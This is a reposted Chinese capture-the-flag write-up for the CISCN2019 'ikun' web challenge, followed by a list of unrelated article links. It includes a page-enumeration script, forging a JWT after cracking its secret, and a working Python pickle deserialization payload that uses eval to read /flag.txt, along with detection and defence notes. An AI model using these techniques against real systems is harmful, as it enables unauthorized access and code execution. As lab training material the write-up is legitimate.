[CISCN2019 华北赛区 Day1 Web2]ikun
本文共 1992 字,大约阅读时间需要 6 分钟。
[CISCN2019 华北赛区 Day1 Web2]ikun
shopping
import requestsurl="http://3ecc60d7-c14f-4805-9476-71bcd91747c8.node3.buuoj.cn/shop?page="for i in range(0,2000): print(i) r=requests.get( url + str(i) ) if 'lv6.png' in r.text: print (i) break
右边location显示/b1g_m4mber 访问:
这里涉及到JWT伪造漏洞 JWT伪造
首先建立docker,攻击jwt:
爆出来key: Secret is "1Kun"
然后访问,将jwt复制上去即可
把username改为admin,把key填为1Kun即可。 然后将左边的jwt复制下来,填充进cookie模块即可: 
刷新一下即可。 然后找到源码,审计即可。
审计
根据提示后门找到admin.py
pickle模块只能在python中使用,python中几乎所有的数据类型(列表,字典,集合,类等)都可以用pickle来序列化,
pickle序列化后的数据,可读性差,人一般无法识别。p = pickle.loads(urllib.unquote(become))
urllib.unquote:将存入的字典参数编码为URL查询字符串,即转换成以key1 = value1 & key2 = value2的形式pickle.loads(bytes_object): 从字节对象中读取被封装的对象,并返回我看了师傅们的博客之后的理解就是,我们构建一个类,类里面的__reduce__python魔术方法会在该类被反序列化的时候会被调用Pickle模块中最常用的函数为:
- pickle.dump(obj, file, [,protocol])
函数的功能:将obj对象序列化存入已经打开的file中。参数讲解:obj:想要序列化的obj对象。file:文件名称。protocol:序列化使用的协议。如果该项省略,则默认为0。如果为负值或HIGHEST_PROTOCOL,则使用最高的协议版本。
- pickle.load(file)
函数的功能:将file中的对象序列化读出。参数讲解:file:文件名称。
- pickle.dumps(obj[, protocol])
函数的功能:将obj对象序列化为string形式,而不是存入文件中。参数讲解:obj:想要序列化的obj对象。protocal:如果该项省略,则默认为0。如果为负值或HIGHEST_PROTOCOL,则使用最高的协议版本。
- pickle.loads(string)
函数的功能:从string中读出序列化前的obj对象。参数讲解:string:文件名称。【注】 dump() 与 load() 相比 dumps() 和 loads() 还有另一种能力:dump()函数能一个接着一个地将几个对象序列化存储到同一个文件中,随后调用load()来以同样的顺序反序列化读出这些对象。而在__reduce__方法里面我们就进行读取flag.txt文件,并将该类序列化之后进行URL编码
检测反序列化方法:
全局搜索Python代码中是否含有关键字类似“import cPickle”或“import pickle”等,若存在则进一步确认是否调用cPickle.loads()或pickle.loads()且反序列化的参数可控。
防御方法
1、用更高级的接口__getnewargs()、__getstate__()、__setstate__()等代替__reduce__()魔术方法;2、进行反序列化操作之前,进行严格的过滤,若采用的是pickle库可采用装饰器实现。
打洞
import pickleimport urllibclass payload(object): def __reduce__(self): return (eval, ("open('/flag.txt','r').read()",))a = pickle.dumps(payload())a = urllib.quote(a)print a c__builtin__%0Aeval%0Ap0%0A%28S%22open%28%27/flag.txt%27%2C%27r%27%29.read%28%29%22%0Ap1%0Atp2%0ARp3%0A.
转载地址:http://oapbi.baihongyu.com/
你可能感兴趣的文章
小技巧要你命三千之:checkbox radio select 只读效果
查看>>
Android开发(一)Android搭建、HelloWorld
查看>>
Android开发(一)拨打电话程序
查看>>
Android开发(一)发送短信程序
查看>>
Android(二)数据存储和访问 之文件
查看>>
Android(三)数据存储之XML解析技术
查看>>
Android(三) 数据存储之二 SharedPreferences
查看>>
Android(三)数据存储之三SQLite嵌入式数据库
查看>>
Android(四)数据存储之四ContentProvider
查看>>
Android(四)数据存储之四网络
查看>>
Android(五)数据存储之五网络数据交互
查看>>
Android(五)数据存储之五网络多线程断点下载
查看>>
Android(六)Activity、请求码与结果码、Intent、广播、服务
查看>>
Android(六)通知、样式、主题、HTML
查看>>
浅谈 Facade 模式
查看>>
单例模式中,懒汉式和饿汉式的区别
查看>>
设计模式之Factory
查看>>
使用Hibernate进行大数据量的性能测试
查看>>
浅谈HTTP的无状态性
查看>>
web service中的事务控制
查看>>